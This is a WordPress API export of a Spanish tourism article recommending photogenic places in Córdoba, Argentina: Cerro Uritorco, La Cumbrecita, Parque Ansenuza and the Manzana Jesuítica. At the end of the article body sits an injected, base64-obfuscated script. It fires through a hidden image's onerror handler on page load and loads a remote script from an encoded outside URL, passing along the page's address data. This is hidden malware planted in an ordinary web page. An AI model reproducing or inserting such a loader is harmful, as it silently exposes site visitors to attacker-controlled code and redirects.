{"id":7347,"date":"2023-09-20T20:49:35","date_gmt":"2023-09-20T23:49:35","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7347"},"modified":"2025-08-13T15:53:35","modified_gmt":"2025-08-13T18:53:35","slug":"cordoba-una-de-las-provincias-mas-instagrameables-del-pais","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7347","title":{"rendered":"C\u00f3rdoba, una de las provincias m\u00e1s \u00abinstagrameables\u00bb del pa\u00eds"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#b50961\"><em>Sierras, r\u00edos, cascos hist\u00f3ricos y monumentos emblem\u00e1ticos, un c\u00f3ctel perfecto para fotografiar. Un recorrido por los puntos ideales para compartir en redes.<\/em><\/h4>\n\n\n\n<p>Para los amantes de guardar im\u00e1genes de los lugares que visitan, las provincias argentinas son un sitio ideal. Con paisajes naturales y estructuras arquitect\u00f3nicas espl\u00e9ndidas.<\/p>\n\n\n\n<p>C\u00f3rdoba cuenta con una variedad de escenarios \u00fanicos para explorar y tambi\u00e9n para retratar. Los diversos paisajes serranos, junto con sus distintos espacios de inter\u00e9s arquitect\u00f3nico, son ideales para capturar cada instante y compartir cada vivencia.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-1024x466.png\" alt=\"\" class=\"wp-image-7293\" width=\"537\" height=\"244\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-1024x466.png 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-300x136.png 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-768x349.png 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-696x316.png 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-1068x486.png 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-924x420.png 924w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-320x145.png 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-480x218.png 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2-800x364.png 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/unnamed-2.png 1366w\" sizes=\"(max-width: 537px) 100vw, 537px\" \/><\/a><figcaption class=\"wp-element-caption\"><strong><em>Publicidad:<\/em><\/strong><\/figcaption><\/figure>\n<\/div>\n\n\n<p><strong>\u00bfCu\u00e1les son los lugares ideales para fotografiar en C\u00f3rdoba?<\/strong><\/p>\n\n\n\n<p><strong><em>Cerro Uritorco<\/em><\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/fAO0im73svTTDZMwbjr0Wa6hg0Us6eYP1Lg_Fa0fh00GlqkB8oJhrKsiXJfxYJ9yjHlgpXC3pllMTyNVmoCtYR0z69Z20uNPt-wL4u74datlbcN3x4a_ONY7vfKlzE3OcVshasEFAbR-BCeXSHgw82I\" alt=\"\" \/><\/figure>\n\n\n\n<p>Previo al ascenso, se aprecia en las calles una secuencia de murales y pinturas que remiten al car\u00e1cter sereno de la localidad. Al transitar la senda del Uritorco se potencia la sensaci\u00f3n de estar viviendo una experiencia de naturaleza espiritual.<\/p>\n\n\n\n<p>En plan de exploraci\u00f3n fotogr\u00e1fica el desaf\u00edo es capturar esta atm\u00f3sfera. Durante el recorrido es posible ver prodigios como el rey del bosque, la reina mora, colibr\u00edes, calandrias, zorzales y garzas, entre otras especies aut\u00f3ctonas. Por las laderas crecen cocos, matorrales de romerillo, pastizales de las sierras, cactus y suculentas.<\/p>\n\n\n\n<p>El broche de oro para esta aventura fotogr\u00e1fica sobre el cerro es la excursi\u00f3n de trekking \u00abAtardecer en el Uritorco\u00bb. Participar de esta traves\u00eda posibilita explorar sus secretos y registrarlos en composiciones potenciadas por la singularidad del crep\u00fasculo.<\/p>\n\n\n\n<p><strong><em>La Cumbrecita<\/em><\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/5U891AU8a3zPOmf9bxadCiC4_N2a8sjUGu4rVVk7vR9P6OUJo5T_b0AcgbMXI5g6Y2FKjR4b3FKkFp9B3JIMmL9W7cLdW8bpwlMiwHX9J0BpjO9qoHNXfGjtZBFTkiGKdkos6hkzIsJq7ffsUCHF2Go\" alt=\"\" \/><\/figure>\n\n\n\n<p>A La Cumbrecita se le considera el primer pueblo peatonal del pa\u00eds. Se ubica a 122 kil\u00f3metros de C\u00f3rdoba capital, en el punto m\u00e1s alto de la provincia, donde las aguas trasl\u00facidas contrastan con un paseo de artesanos de impronta multicolor.<\/p>\n\n\n\n<p>El lugar ofrece un amplio abanico de posibilidades a fot\u00f3grafos y aficionados. Permite obtener material profesional o simples recuerdos que capturen la est\u00e9tica alpina de esta localidad.<\/p>\n\n\n\n<p>En La Cumbrecita hay casas, caba\u00f1as y tiendas de estilo centroeuropeo en plena fusi\u00f3n con un entorno de pinares y arroyos. Destacan las im\u00e1genes del R\u00edo del Medio y sus cascadas, as\u00ed como el gran puente que les da la bienvenida a los visitantes.<\/p>\n\n\n\n<p><strong><em>Parque Ansenuza<\/em><\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/wQ6REFP7n8h1EyiOQpqAsyr1HdB7lHjpR44C8-dyx_19AjzKvCBUsc70Ag4xGxVnvIMdu6PWaY9QGO7md6oKtjz1sz76PFZGnwQsvc3LrAmrvQTQoOcWRpOwFOUWPWsEnEV9sVmBpFrICJLcsGcYuf0\" alt=\"\" \/><\/figure>\n\n\n\n<p>El Parque Ansenuza es un \u00c1rea Natural Protegida que comprende m\u00e1s de 660 mil hect\u00e1reas. Abarca una gran diversidad de ambientes que incluyen el gran espejo salino, cauces de r\u00edos y lagunas permanentes y temporarias, playas barrosas, matorrales de arbustos y cardones, bosques chaque\u00f1os y pastizales y sabanas inundables.<\/p>\n\n\n\n<p>El conjunto representa una oportunidad para fotografiar los contrastes del ecosistema, con \u00e9nfasis en la variedad de la fauna silvestre. En Ansenuza se encuentra m\u00e1s del 60 por ciento de las especies de aves migratorias y playeras del pa\u00eds.<\/p>\n\n\n\n<p>El parque tambi\u00e9n se presta para participar de excursiones acu\u00e1ticas rumbo a costas lejanas, entre \u00e1rboles petrificados, ruinas inundadas y otras vistas surrealistas que plantean el desaf\u00edo de capturar en c\u00e1mara su aura espectral.<\/p>\n\n\n\n<p><strong><em>Manzana Jesu\u00edtica<\/em><\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/I0AEHwD1QRvdceTCyr2wYhMArXCoCICAcbmspjlZzkD159HK51VC5uzpMjLaZozN3HR0Bd8RI7FjCeBbsUVbC-oSz2xMICgjF___J-J0jdyFk2lNrsy3By1adi_t7lsD8fMX5sdqaPuxQNb5hxY4Kz4\" alt=\"\" \/><\/figure>\n\n\n\n<p>La Manzana Jesu\u00edtica cuenta con la Iglesia de la Compa\u00f1\u00eda, la Capilla Dom\u00e9stica, la Residencia de los padres y el Rectorado de la Universidad Nacional de C\u00f3rdoba. Es un conjunto que fue clave en el desarrollo cultural, econ\u00f3mico y territorial de la provincia.<\/p>\n\n\n\n<p>Su obra comenz\u00f3 en 1608 y durante 100 a\u00f1os se a\u00f1adieron distintos edificios que m\u00e1s tarde pasaron a conformar la actual disposici\u00f3n. En estas construcciones se observan algunas de las m\u00e1ximas expresiones del arte barroco de Am\u00e9rica.<\/p>\n\n\n\n<p>Por eso, cualquier paseo por la Manzana abre muchas opciones en materia fotogr\u00e1fica. El ojo atento podr\u00e1 notar las b\u00f3vedas pintadas y los retablos de la Iglesia y la Capilla Dom\u00e9stica, entre otros detalles.<\/p>\n\n\n\n<p>Queda claro que C\u00f3rdoba es un lugar ideal para los fot\u00f3grafos y los aficionados de capturar momentos \u00fanicos. Cualquier sitio en esta provincia es instagrameable.<\/p>\n\n\n\n<p>Fuente: Prensa RONDA<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Sierras, r\u00edos, cascos hist\u00f3ricos y monumentos emblem\u00e1ticos, un c\u00f3ctel perfecto para fotografiar. Un recorrido por los puntos ideales para compartir en redes. Para los amantes de guardar im\u00e1genes de los lugares que visitan, las provincias argentinas son un sitio ideal. Con paisajes naturales y estructuras arquitect\u00f3nicas espl\u00e9ndidas. C\u00f3rdoba cuenta con una variedad de escenarios \u00fanicos [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7348,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[31,20],"tags":[],"class_list":["post-7347","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-colaboradores","category-pampeana"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7347","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7347"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7347\/revisions"}],"predecessor-version":[{"id":10306,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7347\/revisions\/10306"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7348"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7347"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7347"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7347"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}